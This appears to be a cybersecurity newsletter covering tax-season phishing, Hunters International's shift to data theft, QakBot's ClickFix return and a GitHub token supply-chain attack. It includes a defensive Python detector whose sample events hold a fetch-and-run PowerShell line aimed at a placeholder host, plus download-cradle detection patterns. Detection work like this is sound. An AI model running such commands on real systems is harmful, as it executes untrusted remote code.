
Threat Intel Update
It’s that time of year again—tax season. As people gather documents and some receive notices from the IRS, cybercriminals are actively looking to exploit the situation. Tax season presents a prime opportunity for threat actors, who often use major events to fuel their malicious campaigns.
This week, new details emerged about a well-known ransomware group shifting tactics. Instead of encrypting data, they’re now focusing solely on exfiltrating sensitive information. Meanwhile, more threat actors are jumping on the ClickFix campaign trend—including the group behind QakBot, which seems to have reemerged after a 2023 disruption to its infrastructure.
ClickFix campaigns typically trick users into executing PowerShell commands, which then install malware on their systems. As tax season heats up, so does cybercriminal activity—so being vigilant is more critical than ever.
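As an added example (not code from the original briefing), here is a small Python detection pass over constructed process-creation events that flags the ClickFix execution pattern described above: PowerShell started from explorer.exe (typically the parent when a command is pasted into the Run dialog) with run-hidden, encoded, policy-bypass or fetch-and-execute indicators. The event field names and the sample command lines are assumptions, not real telemetry.

```python
import re

# Constructed sample events in a reduced Windows 4688 / Sysmon-1 shape (assumption: the
# collector already split parent image, image and command line). Not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -NoProfile -EncodedCommand QUFBQUFBQUE="},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": 'pwsh.exe -ep bypass -c "iwr http://placeholder.invalid/x | iex"'},
    {"parent": r"C:\Program Files\Vendor\Agent.exe",   # benign: management agent
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\ProgramData\\Vendor\\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe",              # benign: not PowerShell
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
]

# Indicators that a pasted command was meant to run unseen and pull in more code.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
}
POWERSHELL = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
INTERACTIVE_PARENT = re.compile(r"\\explorer\.exe$", re.I)


def detect_clickfix(events):
    """Return (event_index, [indicator names]) for each PowerShell process whose parent
    is the interactive shell and whose command line carries at least one indicator."""
    hits = []
    for idx, ev in enumerate(events):
        if not (INTERACTIVE_PARENT.search(ev["parent"]) and POWERSHELL.search(ev["image"])):
            continue
        matched = [name for name, rx in INDICATORS.items() if rx.search(ev["cmdline"])]
        if matched:
            hits.append((idx, matched))
    return hits


if __name__ == "__main__":
    for idx, names in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {idx}: possible ClickFix execution ({', '.join(names)})")
```

The parent-process condition is what separates this from ordinary scripted PowerShell use; tune the indicator list to your own baseline before alerting on it.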
Cybersecurity News
- Tax-Themed Phishing Attacks Delivering Malware – Cybercriminals are taking advantage of tax season by launching phishing campaigns that impersonate official tax-related communications. These fraudulent emails are designed to trick recipients into disclosing sensitive information or unknowingly installing malware. Microsoft has issued a warning urging individuals and organizations to stay alert and carefully verify the legitimacy of any tax-related messages they receive. The Hacker News
- Hunters International Ransomware Gang Rebrands and Shifts Focus – The cybercrime group known as Hunters International is moving away from traditional ransomware attacks and is now focusing exclusively on data theft and extortion. Previously linked to ransomware incidents impacting around 300 organizations—primarily in North America—the group has significantly evolved its tactics. In August 2024, Hunters International abandoned ransomware notes and began directly contacting CEOs and senior executives of victim organizations to negotiate payments. By January 2025, the group launched a new initiative called World Leaks, aimed at carrying out exfiltration-only attacks. However, the project ran into infrastructure challenges, leading to a temporary pause in its operations. SecurityWeek
- QakBot Resurfaces with Social Media Lures and ClickFix Deployment Tactics – Following a global law enforcement takedown in 2023, the QakBot banking Trojan has resurfaced with a revamped approach. Threat actors are now exploiting social media platforms like LinkedIn to distribute malicious links, directing users to fake websites that present bogus CAPTCHA challenges. Once engaged, these sites initiate the download of malware onto the victim’s system using the ClickFix technique. Recent campaigns have targeted sectors including healthcare, construction, and government—highlighting the growing sophistication of social engineering tactics and the need for heightened awareness. Dark Reading
- Jailbroken Devices Pose Elevated Malware Risk, Increasing Threat to Corporate Environments – Jailbreaking or rooting mobile devices—often done to enable customization or bypass restrictions—dramatically increases security vulnerabilities. Recent studies reveal that these compromised devices are 3.5 times more likely to be infected with malware and face a staggering 250-fold increase in the risk of total device compromise. For organizations, this trend amplifies the risks associated with Bring Your Own Device (BYOD) policies, underscoring the urgent need for strong mobile security controls and user awareness. Dark Reading
- Compromised Personal Access Token Triggers GitHub Actions Supply Chain Attack – A compromised Personal Access Token (PAT) associated with the SpotBugs project, initially exposed via a malicious pull request in December 2024, was leveraged in March 2025 to carry out a supply chain attack on GitHub Actions. Threat actors used the stolen token to manipulate GitHub Actions workflows, resulting in the exposure of CI/CD secrets across multiple repositories. This incident underscores the security challenges in open-source ecosystems and reinforces the urgent need for robust access controls and secure development practices. SecurityWeek